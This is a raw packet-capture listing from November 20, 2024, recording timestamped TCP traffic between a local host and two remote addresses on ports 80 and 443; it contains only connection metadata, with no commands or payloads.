                                                                                                                                                                                                Nov 20, 2024 10:54:34.505199909 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.505213976 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.505228043 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.505254984 CET4981280192.168.2.7185.215.113.16
                                                                                                                                                                                                Nov 20, 2024 10:54:34.505842924 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.505899906 CET4981280192.168.2.7185.215.113.16
                                                                                                                                                                                                Nov 20, 2024 10:54:34.505912066 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.505925894 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.505940914 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.505959034 CET4981280192.168.2.7185.215.113.16
                                                                                                                                                                                                Nov 20, 2024 10:54:34.506439924 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.506453991 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.506468058 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.506486893 CET4981280192.168.2.7185.215.113.16
                                                                                                                                                                                                Nov 20, 2024 10:54:34.506504059 CET4981280192.168.2.7185.215.113.16
                                                                                                                                                                                                Nov 20, 2024 10:54:34.506520987 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.507128000 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.507143974 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.507158041 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.507164955 CET4981280192.168.2.7185.215.113.16
                                                                                                                                                                                                Nov 20, 2024 10:54:34.507208109 CET4981280192.168.2.7185.215.113.16
                                                                                                                                                                                                Nov 20, 2024 10:54:34.508090019 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.508111954 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.508150101 CET4981280192.168.2.7185.215.113.16
                                                                                                                                                                                                Nov 20, 2024 10:54:34.508176088 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.508199930 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.508215904 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.508229971 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.508239031 CET4981280192.168.2.7185.215.113.16
                                                                                                                                                                                                Nov 20, 2024 10:54:34.508246899 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.508265972 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.508268118 CET4981280192.168.2.7185.215.113.16
                                                                                                                                                                                                Nov 20, 2024 10:54:34.508292913 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.508304119 CET4981280192.168.2.7185.215.113.16
                                                                                                                                                                                                Nov 20, 2024 10:54:34.508308887 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.508325100 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.508338928 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.508353949 CET4981280192.168.2.7185.215.113.16
                                                                                                                                                                                                Nov 20, 2024 10:54:34.508354902 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.508378029 CET4981280192.168.2.7185.215.113.16
                                                                                                                                                                                                Nov 20, 2024 10:54:34.508394957 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.508409977 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.508424997 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.508436918 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.508440018 CET4981280192.168.2.7185.215.113.16
                                                                                                                                                                                                Nov 20, 2024 10:54:34.508595943 CET4981280192.168.2.7185.215.113.16
                                                                                                                                                                                                Nov 20, 2024 10:54:34.510552883 CET4434981813.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.511132956 CET49818443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:34.511148930 CET4434981813.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.511733055 CET49818443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:34.511737108 CET4434981813.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.526154041 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.526168108 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.526184082 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.526211023 CET4981280192.168.2.7185.215.113.16
                                                                                                                                                                                                Nov 20, 2024 10:54:34.526226044 CET4981280192.168.2.7185.215.113.16
                                                                                                                                                                                                Nov 20, 2024 10:54:34.526243925 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.526258945 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.526273966 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.526288986 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.526297092 CET4981280192.168.2.7185.215.113.16
                                                                                                                                                                                                Nov 20, 2024 10:54:34.526308060 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.526328087 CET4981280192.168.2.7185.215.113.16
                                                                                                                                                                                                Nov 20, 2024 10:54:34.526333094 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.526350975 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.526365042 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.526372910 CET4981280192.168.2.7185.215.113.16
                                                                                                                                                                                                Nov 20, 2024 10:54:34.526381016 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.526411057 CET4981280192.168.2.7185.215.113.16
                                                                                                                                                                                                Nov 20, 2024 10:54:34.526413918 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.526453972 CET4981280192.168.2.7185.215.113.16
                                                                                                                                                                                                Nov 20, 2024 10:54:34.526458025 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.526473999 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.526488066 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.526511908 CET4981280192.168.2.7185.215.113.16
                                                                                                                                                                                                Nov 20, 2024 10:54:34.527271032 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.527333021 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.527345896 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.527362108 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.527386904 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.527401924 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.527416945 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.527431011 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.527435064 CET4981280192.168.2.7185.215.113.16
                                                                                                                                                                                                Nov 20, 2024 10:54:34.527435064 CET4981280192.168.2.7185.215.113.16
                                                                                                                                                                                                Nov 20, 2024 10:54:34.527435064 CET4981280192.168.2.7185.215.113.16
                                                                                                                                                                                                Nov 20, 2024 10:54:34.527451992 CET4981280192.168.2.7185.215.113.16
                                                                                                                                                                                                Nov 20, 2024 10:54:34.561983109 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.562007904 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.562022924 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.562037945 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.562040091 CET4981280192.168.2.7185.215.113.16
                                                                                                                                                                                                Nov 20, 2024 10:54:34.562055111 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.562067032 CET4981280192.168.2.7185.215.113.16
                                                                                                                                                                                                Nov 20, 2024 10:54:34.562071085 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.562088966 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.562103033 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.562107086 CET4981280192.168.2.7185.215.113.16
                                                                                                                                                                                                Nov 20, 2024 10:54:34.562146902 CET4981280192.168.2.7185.215.113.16
                                                                                                                                                                                                Nov 20, 2024 10:54:34.566860914 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.566875935 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.566898108 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.566916943 CET4981280192.168.2.7185.215.113.16
                                                                                                                                                                                                Nov 20, 2024 10:54:34.566925049 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.566939116 CET4981280192.168.2.7185.215.113.16
                                                                                                                                                                                                Nov 20, 2024 10:54:34.566947937 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.566962957 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.566978931 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.566986084 CET4981280192.168.2.7185.215.113.16
                                                                                                                                                                                                Nov 20, 2024 10:54:34.566996098 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.567009926 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.567019939 CET4981280192.168.2.7185.215.113.16
                                                                                                                                                                                                Nov 20, 2024 10:54:34.567025900 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.567048073 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.567048073 CET4981280192.168.2.7185.215.113.16
                                                                                                                                                                                                Nov 20, 2024 10:54:34.567070007 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.567085028 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.567090034 CET4981280192.168.2.7185.215.113.16
                                                                                                                                                                                                Nov 20, 2024 10:54:34.567101955 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.567116976 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.567126036 CET4981280192.168.2.7185.215.113.16
                                                                                                                                                                                                Nov 20, 2024 10:54:34.567133904 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.567156076 CET4981280192.168.2.7185.215.113.16
                                                                                                                                                                                                Nov 20, 2024 10:54:34.567167044 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.567192078 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.567204952 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.567207098 CET4981280192.168.2.7185.215.113.16
                                                                                                                                                                                                Nov 20, 2024 10:54:34.567222118 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.567236900 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.567245007 CET4981280192.168.2.7185.215.113.16
                                                                                                                                                                                                Nov 20, 2024 10:54:34.567253113 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.567274094 CET4981280192.168.2.7185.215.113.16
                                                                                                                                                                                                Nov 20, 2024 10:54:34.567276001 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.567291975 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.567306042 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.567327976 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.567332983 CET4981280192.168.2.7185.215.113.16
                                                                                                                                                                                                Nov 20, 2024 10:54:34.567342997 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.567353010 CET4981280192.168.2.7185.215.113.16
                                                                                                                                                                                                Nov 20, 2024 10:54:34.567359924 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.567373991 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.567380905 CET4981280192.168.2.7185.215.113.16
                                                                                                                                                                                                Nov 20, 2024 10:54:34.567393064 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.567409992 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.567416906 CET4981280192.168.2.7185.215.113.16
                                                                                                                                                                                                Nov 20, 2024 10:54:34.567429066 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.567445040 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.567451000 CET4981280192.168.2.7185.215.113.16
                                                                                                                                                                                                Nov 20, 2024 10:54:34.567468882 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.567482948 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.567497969 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.567498922 CET4981280192.168.2.7185.215.113.16
                                                                                                                                                                                                Nov 20, 2024 10:54:34.567512035 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.567528009 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.567539930 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.567544937 CET4981280192.168.2.7185.215.113.16
                                                                                                                                                                                                Nov 20, 2024 10:54:34.567578077 CET4981280192.168.2.7185.215.113.16
                                                                                                                                                                                                Nov 20, 2024 10:54:34.567599058 CET4981280192.168.2.7185.215.113.16
                                                                                                                                                                                                Nov 20, 2024 10:54:34.568747997 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.568763018 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.568778992 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.568794966 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.568808079 CET4981280192.168.2.7185.215.113.16
                                                                                                                                                                                                Nov 20, 2024 10:54:34.568810940 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.568826914 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.568840981 CET4981280192.168.2.7185.215.113.16
                                                                                                                                                                                                Nov 20, 2024 10:54:34.568842888 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.568859100 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.568870068 CET4981280192.168.2.7185.215.113.16
                                                                                                                                                                                                Nov 20, 2024 10:54:34.568895102 CET4981280192.168.2.7185.215.113.16
                                                                                                                                                                                                Nov 20, 2024 10:54:34.568900108 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.568916082 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.568931103 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.568957090 CET4981280192.168.2.7185.215.113.16
                                                                                                                                                                                                Nov 20, 2024 10:54:34.569086075 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.569101095 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.569117069 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.569124937 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.569130898 CET4981280192.168.2.7185.215.113.16
                                                                                                                                                                                                Nov 20, 2024 10:54:34.569152117 CET4981280192.168.2.7185.215.113.16
                                                                                                                                                                                                Nov 20, 2024 10:54:34.569243908 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.569261074 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.569274902 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.569288015 CET4981280192.168.2.7185.215.113.16
                                                                                                                                                                                                Nov 20, 2024 10:54:34.569289923 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.569305897 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.569312096 CET4981280192.168.2.7185.215.113.16
                                                                                                                                                                                                Nov 20, 2024 10:54:34.569386959 CET4981280192.168.2.7185.215.113.16
                                                                                                                                                                                                Nov 20, 2024 10:54:34.569410086 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.569427013 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.569441080 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.569469929 CET4981280192.168.2.7185.215.113.16
                                                                                                                                                                                                Nov 20, 2024 10:54:34.595896006 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.595910072 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.595925093 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.595940113 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.595954895 CET4981280192.168.2.7185.215.113.16
                                                                                                                                                                                                Nov 20, 2024 10:54:34.595963001 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.595978975 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.595979929 CET4981280192.168.2.7185.215.113.16
                                                                                                                                                                                                Nov 20, 2024 10:54:34.596009970 CET4981280192.168.2.7185.215.113.16
                                                                                                                                                                                                Nov 20, 2024 10:54:34.596035957 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.596051931 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.596081018 CET4981280192.168.2.7185.215.113.16
                                                                                                                                                                                                Nov 20, 2024 10:54:34.597929955 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.597975969 CET4981280192.168.2.7185.215.113.16
                                                                                                                                                                                                Nov 20, 2024 10:54:34.598094940 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.598109961 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.598157883 CET4981280192.168.2.7185.215.113.16
                                                                                                                                                                                                Nov 20, 2024 10:54:34.598237991 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.598253965 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.598269939 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.598284006 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.598299980 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.598305941 CET4981280192.168.2.7185.215.113.16
                                                                                                                                                                                                Nov 20, 2024 10:54:34.598329067 CET4981280192.168.2.7185.215.113.16
                                                                                                                                                                                                Nov 20, 2024 10:54:34.599448919 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.599462032 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.599494934 CET4981280192.168.2.7185.215.113.16
                                                                                                                                                                                                Nov 20, 2024 10:54:34.599607944 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.599636078 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.599652052 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.599658966 CET4981280192.168.2.7185.215.113.16
                                                                                                                                                                                                Nov 20, 2024 10:54:34.599667072 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.599682093 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.599688053 CET4981280192.168.2.7185.215.113.16
                                                                                                                                                                                                Nov 20, 2024 10:54:34.599698067 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.599714041 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.599720001 CET4981280192.168.2.7185.215.113.16
                                                                                                                                                                                                Nov 20, 2024 10:54:34.599730015 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.599745989 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.599751949 CET4981280192.168.2.7185.215.113.16
                                                                                                                                                                                                Nov 20, 2024 10:54:34.599761009 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.599776983 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.599786043 CET4981280192.168.2.7185.215.113.16
                                                                                                                                                                                                Nov 20, 2024 10:54:34.599792004 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.599807978 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.599811077 CET4981280192.168.2.7185.215.113.16
                                                                                                                                                                                                Nov 20, 2024 10:54:34.599823952 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.599853039 CET4981280192.168.2.7185.215.113.16
                                                                                                                                                                                                Nov 20, 2024 10:54:34.617252111 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.617268085 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.617295027 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.617311001 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.617312908 CET4981280192.168.2.7185.215.113.16
                                                                                                                                                                                                Nov 20, 2024 10:54:34.617332935 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.617347956 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.617360115 CET4981280192.168.2.7185.215.113.16
                                                                                                                                                                                                Nov 20, 2024 10:54:34.617363930 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.617378950 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.617384911 CET4981280192.168.2.7185.215.113.16
                                                                                                                                                                                                Nov 20, 2024 10:54:34.617397070 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.617413998 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.617413998 CET4981280192.168.2.7185.215.113.16
                                                                                                                                                                                                Nov 20, 2024 10:54:34.617432117 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.617448092 CET4981280192.168.2.7185.215.113.16
                                                                                                                                                                                                Nov 20, 2024 10:54:34.617456913 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.617476940 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.617479086 CET4981280192.168.2.7185.215.113.16
                                                                                                                                                                                                Nov 20, 2024 10:54:34.617491961 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.617506981 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.617527962 CET4981280192.168.2.7185.215.113.16
                                                                                                                                                                                                Nov 20, 2024 10:54:34.617554903 CET4981280192.168.2.7185.215.113.16
                                                                                                                                                                                                Nov 20, 2024 10:54:34.618288994 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.618304968 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.618313074 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.618319988 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.618328094 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.618340015 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.618357897 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.618365049 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.618546009 CET4981280192.168.2.7185.215.113.16
                                                                                                                                                                                                Nov 20, 2024 10:54:34.620560884 CET4434981813.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.620842934 CET4434981813.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.620904922 CET49818443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:34.620940924 CET49818443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:34.620954990 CET4434981813.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.620960951 CET49818443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:34.620969057 CET4434981813.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.624758005 CET49824443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:34.624780893 CET4434982413.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.624855042 CET49824443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:34.625312090 CET49824443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:34.625324965 CET4434982413.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.653038025 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.653053045 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.653076887 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.653094053 CET8049812185.215.113.16192.168.2.7
